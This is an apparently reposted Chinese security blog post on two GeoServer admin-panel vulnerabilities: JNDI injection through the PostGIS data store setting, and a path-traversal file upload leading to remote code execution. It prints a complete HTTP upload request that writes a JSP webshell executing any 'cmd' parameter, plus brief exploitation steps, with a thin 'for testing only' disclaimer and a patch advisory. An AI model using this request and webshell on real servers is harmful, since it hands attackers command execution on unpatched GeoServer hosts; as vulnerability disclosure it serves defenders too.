一、后台JNDI 注⼊
测试版本:Version 2.13.3
数据储存—》添加新的数据存储—》PostGIS (JNDI) —》jndiReferenceName *
使用CB1链,弹个计算器
二、GeoServer后台文件上传致远程代码执行漏洞
测试版本:Version 2.22.2
修改相对路径为绝对路径,即可愉快的上传webshell了。
我了个去,不解析jsp
换war包用tomcat部署
| POST /geoserver/rest/workspaces/nurc/coveragestores/mosaic/file.shp?filename=../../../../shell/1.jsp HTTP/1.1
Host: localhost:8080 Content-Length: 370 sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120" sec-ch-ua-mobile: ?0 Wicket-FocusedElementId: id39 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36 Content-Type: multipart/form-data; boundary-----WebKitFormBoundaryfoycybhDiQZEqxoy Accept: application/xml, text/xml, */*; q=0.01 Wicket-Ajax-BaseURL: wicket/bookmarkable/org.geoserver.web.data.store.CoverageStoreEditPage?7&storeName=mosaic&wsName=nurc X-Requested-With: XMLHttpRequest Wicket-Ajax: true sec-ch-ua-platform: "Windows" Origin: http://localhost:8080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:8080/geoserver/web/wicket/bookmarkable/org.geoserver.web.data.store.CoverageStoreEditPage?7&storeName=mosaic&wsName=nurc Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie:JSESSIONID=52159346772CE228794C0E097A442D9F Connection: close <% if(request.getParameter("cmd") != null) { java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(" "); while((a=in.read(b))!=-1) { out.print(new String(b)); } out.print(" "); } %> |
该漏洞虽然已公布部分 poc但仍处于 1day状态,请勿用于违法用途,仅做测试环境交流学习。由于该系统弱口令使用情况较为广泛,建议受影响的用户尽快修复漏洞。
原文始发于微信公众号(F12sec):【转载】geoserver漏洞解析以及测试方法
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论